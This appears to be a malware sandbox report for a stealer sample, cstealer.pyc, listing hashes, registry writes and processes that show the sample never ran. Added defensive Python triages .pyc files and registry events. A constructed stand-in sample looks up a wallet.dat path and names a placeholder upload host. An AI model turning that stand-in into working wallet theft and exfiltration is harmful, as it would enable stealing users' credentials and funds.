SHA1 206f9bb7f5ec09d187bf3a87eb8cfcd01b815a94
SHA256 31b86db2b1d9ae0f2422308c9bcb63d7723244cfe0cdfb17d21c2420e36e16c2
SHA512 c20c205f7b15bc8cde52c37948442ac8ea4d4cda44dc4b78df42b800e92135028aee9891ea7934b8898326c0e307c5c7617b9f6f54197b7ec176aa7c4eaccc37

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 e6200d2b3762062f6f17cb7f1cbd1355
SHA1 e09749529e52e4121f834b063871f6ffe78d3c54
SHA256 02cb521cc2a2d3e5b064af7df0d889e7d1f2365189521e04d07309c2a9657fdc
SHA512 cecea2f3570043edc9e0b094c3def19459da61e25817394b531380fea0978b618d990e39dd4dc894bfc69798238f5942d8fdf294dd6efeacaf22084fb6933533

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-debug-l1-1-0.dll

MD5 c4592aeaa9ec4f036063e3effa32589d
SHA1 95808bcc1bb66ad39c5048b738b50e5ff9306efa
SHA256 388339426d7d08a03a350eaa9079a8bb09fb9c643cea6ed6ebffb00757df4b21
SHA512 0af63b47eccfba29ef46e5dde1d67eb8e15eda78b5196af5d56e0ff93b030ed65e3614f5515cd032d6cfe37a7656b70517583698db1ff8c813ed89338f8ce01a

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-datetime-l1-1-0.dll

MD5 2991b14b2dd7f0c386c2d50103ab03a0
SHA1 589fdeab9cb62d02bea1fc0d7e372145e8c9d297
SHA256 a888419983a93c2b26240269e2a7f2e444088b1c4ef3edabfc20ba6c35f12e57
SHA512 e22d5c25499bf88b0fbc922de992394e6c8813492fd324897a7f24867f7bc2fb8e366effba898289ada1e1ea94f78642c049c498b5b783db6651e7bc242ace72

C:\Users\Admin\AppData\Local\Temp\_MEI28562\api-ms-win-core-console-l1-1-0.dll

MD5 6ba1737a03a158ec0fc4974e9b33534b
SHA1 80fc6900f07cbb445f083518cca96c52479758c3
SHA256 bfd94843cfbc732bbb7ef932e5931d77f3c1f2af4aac4c61ea90f60363bc9bd3
SHA512 b7654dce9815efc2d18c5b046a4382b83d20f032b7918cae102a89e1c758b851e3496d8eb2ecc89a850d959095d73b07947a06e3244b0c12ce6b5e01fb881cd2

C:\Users\Admin\AppData\Local\Temp\_MEI28562\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI28562\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI28562\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4960-217-0x0000000005E20000-0x0000000005EB2000-memory.dmp

memory/4960-219-0x0000000005EE0000-0x0000000005EE8000-memory.dmp

memory/4960-218-0x0000000005EB0000-0x0000000005ED6000-memory.dmp

memory/4960-223-0x0000000074F40000-0x00000000756F0000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-07 15:58

Reported

2024-05-07 15:59

Platform

win7-20240221-en

Max time kernel

40s

Max time network

17s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc
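This run hands cstealer.pyc to a Windows 7 guest with no Python interpreter, so the bytecode itself never executes (the process list further down shows the shell falling back to the Open With dialog instead). The usual first step for such a file is static: read the PEP 552 header to learn which CPython release built it and whether it is timestamp- or hash-validated, then, if the magic matches the interpreter you are running, marshal-load and disassemble the code object without executing it. The Python below is an added example, not code from this report, from Stealerium or from PyInstaller; the sample .pyc is built inline from a constructed snippet, and the magic-to-release table is an abridged assumption to extend for other releases.

```python
"""Static triage of a .pyc (PEP 552 header + non-executing disassembly).

Added example, not code from the report, Stealerium or PyInstaller.
The sample .pyc is constructed inline; the magic table is abridged.
"""
import dis
import importlib.util
import io
import marshal
import struct
import types
from dataclasses import dataclass

# Abridged: magic word -> CPython release, as listed in CPython's
# Lib/importlib/_bootstrap_external.py. Extend for other releases;
# an unlisted magic is reported as "unknown".
MAGIC_TO_VERSION = {3413: "3.8", 3425: "3.9", 3439: "3.10",
                    3495: "3.11", 3531: "3.12", 3571: "3.13"}
RUNNING_MAGIC = struct.unpack("<H", importlib.util.MAGIC_NUMBER[:2])[0]


@dataclass(frozen=True)
class PycHeader:
    magic: int
    version: str         # "unknown" when the magic is not in MAGIC_TO_VERSION
    hash_based: bool     # flags bit 0: validated by source hash, not mtime/size
    check_source: bool   # flags bit 1: the hash is actually checked at import
    source_mtime: int    # timestamp-based files only
    source_size: int     # timestamp-based files only
    source_hash: bytes   # hash-based files only (8 bytes)


def looks_like_pyc(data: bytes) -> bool:
    return len(data) >= 16 and data[2:4] == b"\r\n"


def parse_header(data: bytes) -> PycHeader:
    """Decode the 16-byte header; raises ValueError for anything that is not a .pyc."""
    if not looks_like_pyc(data):
        raise ValueError("not a .pyc header")
    magic, flags = struct.unpack("<H2xI", data[:8])
    version = MAGIC_TO_VERSION.get(magic, "unknown")
    if flags & 1:
        return PycHeader(magic, version, True, bool(flags & 2), 0, 0, data[8:16])
    mtime, size = struct.unpack("<II", data[8:16])
    return PycHeader(magic, version, False, False, mtime, size, b"")


def load_code(data: bytes) -> types.CodeType:
    """marshal.loads the code object without running it. Refuses a foreign magic:
    the marshal format changes between releases and a bad load can crash."""
    hdr = parse_header(data)
    if hdr.magic != RUNNING_MAGIC:
        raise RuntimeError(f"compiled for CPython {hdr.version}; disassemble it under that release")
    return marshal.loads(data[16:])


def disassemble(data: bytes) -> str:
    """Bytecode listing of the module and every nested function/class body."""
    buf = io.StringIO()
    dis.dis(load_code(data), file=buf)
    return buf.getvalue()


def string_constants(data: bytes) -> list:
    """Every str constant, recursing into nested code objects: a cheap IOC sweep."""
    found = []

    def walk(code):
        for const in code.co_consts:
            if isinstance(const, str):
                found.append(const)
            elif isinstance(const, types.CodeType):
                walk(const)

    walk(load_code(data))
    return found


# Constructed stand-in for cstealer.pyc; the path and host are made up.
SAMPLE_SOURCE = '''
import os
def collect():
    path = os.path.join(os.environ.get("APPDATA", ""), "ExampleWallet", "wallet.dat")
    return path if os.path.exists(path) else None
EXFIL = "https://upload.example.invalid/"
'''


def build_pyc(source: str, hash_based: bool = False) -> bytes:
    """Assemble a .pyc for the running interpreter (test input only)."""
    code = compile(source, "sample.py", "exec")
    if hash_based:
        header = (importlib.util.MAGIC_NUMBER + struct.pack("<I", 3)
                  + importlib.util.source_hash(source.encode()))
    else:
        header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 1700000000, len(source))
    return header + marshal.dumps(code)


if __name__ == "__main__":
    pyc = build_pyc(SAMPLE_SOURCE)
    print(parse_header(pyc))
    print(string_constants(pyc))
    print(disassemble(pyc))
```

A PyInstaller bundle ships one specific CPython runtime (the python3x.dll next to the _MEI files), so the header's magic tells you which interpreter, or which decompiler build, to use before you go further; loading a .pyc from a different release with marshal is not safe.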

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pyc C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pyc\ = "pyc_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pyc_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cstealer.pyc"
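The process list explains the signature hits above: `rundll32.exe shell32.dll,OpenAs_RunDLL <file>` is the Windows Open With dialog, and the `pyc_auto_file` keys it created under the user's Classes hive are the per-user association the dialog writes once a handler is chosen. AcroRd32.exe then opened cstealer.pyc as a document, which is also why the SetWindowsHookEx signature is attributed to Reader. None of this is the sample's behaviour; it means the guest had no handler for .pyc and the payload did not run. The Python below is an added triage helper, not code from this report, from the sandbox vendor or from Stealerium; it separates that dialog artifact from a real file-association hijack, using rows constructed from the tables on this page.

```python
"""Triage helper for the behavioral3 'Modifies registry class' hits.

Added example; not code from the report, the sandbox vendor or Stealerium.
It splits a signature that lumps two things together: a file-association
hijack written by malware, and the user-level association that the Windows
"Open with" dialog (rundll32 shell32.dll,OpenAs_RunDLL) writes when a file
type has no handler. Rows below are constructed from the report's tables.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegEvent:   # one row of the Description / Indicator / Process table
    description: str
    indicator: str
    process: str


@dataclass(frozen=True)
class ProcEvent:  # one entry of the Processes list
    image: str
    cmdline: str


HIVE = r"\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000"
RUNDLL = r"C:\Windows\system32\rundll32.exe"

# Constructed from the report (five of the nine rows; the rest have the same shape).
REG_EVENTS = [
    RegEvent("Key created", HIVE + r"_CLASSES\pyc_auto_file", RUNDLL),
    RegEvent("Key created", HIVE + r"_CLASSES\pyc_auto_file\shell\Read\command", RUNDLL),
    RegEvent("Set value (str)",
             HIVE + r'_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""',
             RUNDLL),
    RegEvent("Key created", HIVE + r"_Classes\Local Settings", RUNDLL),
    RegEvent("Set value (str)", HIVE + r'_CLASSES\.pyc\ = "pyc_auto_file"', RUNDLL),
]
PROC_EVENTS = [
    ProcEvent(r"C:\Windows\system32\cmd.exe",
              r"cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc"),
    ProcEvent(RUNDLL,
              r'"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cstealer.pyc'),
    ProcEvent(r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe",
              r'"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cstealer.pyc"'),
]

# A handler living here is worth a look no matter who registered it.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)


def split_indicator(indicator: str):
    """'key\\ = "value"' -> (key, value); value is None for 'Key created' rows."""
    key, sep, value = indicator.partition(" = ")
    return key.rstrip("\\"), (value if sep else None)


def unescape(value: str) -> str:
    """Undo the report's C-style quoting of a REG_SZ value."""
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value) and value[i + 1] in '\\"':
            out.append(value[i + 1])
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def handler_exe(value: str):
    """First token of a shell\\...\\command value: the program that will open the file."""
    m = re.match(r'"([^"]+)"|(\S+)', unescape(value))
    return (m.group(1) or m.group(2)) if m else None


def openas_target(proc_events):
    """File the Open With dialog was shown for, or None if the dialog never ran."""
    for p in proc_events:
        m = re.search(r"shell32\.dll,OpenAs_RunDLL\s+(.+?)\s*$", p.cmdline, re.I)
        if m and p.image.lower().endswith("\\rundll32.exe"):
            return m.group(1).strip('"')
    return None


def classify(ev: RegEvent, openas_path) -> str:
    key, value = split_indicator(ev.indicator)
    cls_key = re.split(r"_classes\\", key, maxsplit=1, flags=re.I)[-1]
    handler = handler_exe(value) if value and key.lower().endswith("\\command") else None
    if handler and USER_WRITABLE.search(handler):
        return "association-to-user-writable-handler"   # review whoever wrote it
    if openas_path and ev.process.lower().endswith("\\rundll32.exe"):
        return "open-with-dialog"                       # Windows wrote it, not the sample
    if re.match(r"(\.\w+|\w+_auto_file)(\\|$)", cls_key, re.I):
        return "file-association-change"                # another process: review
    return "other-class-key"


def triage(reg_events, proc_events) -> dict:
    """Bucket the registry hits and say whether the submitted file actually ran."""
    openas_path = openas_target(proc_events)
    counts = {}
    for ev in reg_events:
        c = classify(ev, openas_path)
        counts[c] = counts.get(c, 0) + 1
    launched = next((p.cmdline for p in proc_events if p.image.lower().endswith("\\cmd.exe")), "")
    m = re.search(r"/c\s+(.+?)\s*$", launched, re.I)
    submitted = m.group(1).strip('"') if m else None
    ran = not (openas_path and submitted and openas_path.lower() == submitted.lower())
    return {"registry": counts, "openas_target": openas_path, "payload_executed": ran}


if __name__ == "__main__":
    print(triage(REG_EVENTS, PROC_EVENTS))
```

For this report the helper buckets every row as `open-with-dialog` and reports `payload_executed: False`, because the file the dialog was shown for is the same file `cmd /c` was asked to run. A hijack looks different: the writing process is not rundll32, or the `command` value points into a user-writable directory, and those rows are the ones to keep in the IOC set.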

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 9ab6766b0a7e7e16f236b4db10bfa7db
SHA1 15fd98789485b7f0b4f39bf52c8dca3d09281622
SHA256 5ff088b5a40d3484471450604fcc6f1afec1794a6fb2c0ce73feddd41f4f0aec
SHA512 5e5d4eb7a7d1f06fa7ea567d9e8a605f4870f67c46c4cfe52c76348e5cff30e0d6752244be34e8aff5693d2877df185fb4b3a85041f305c61c5d226495d5a653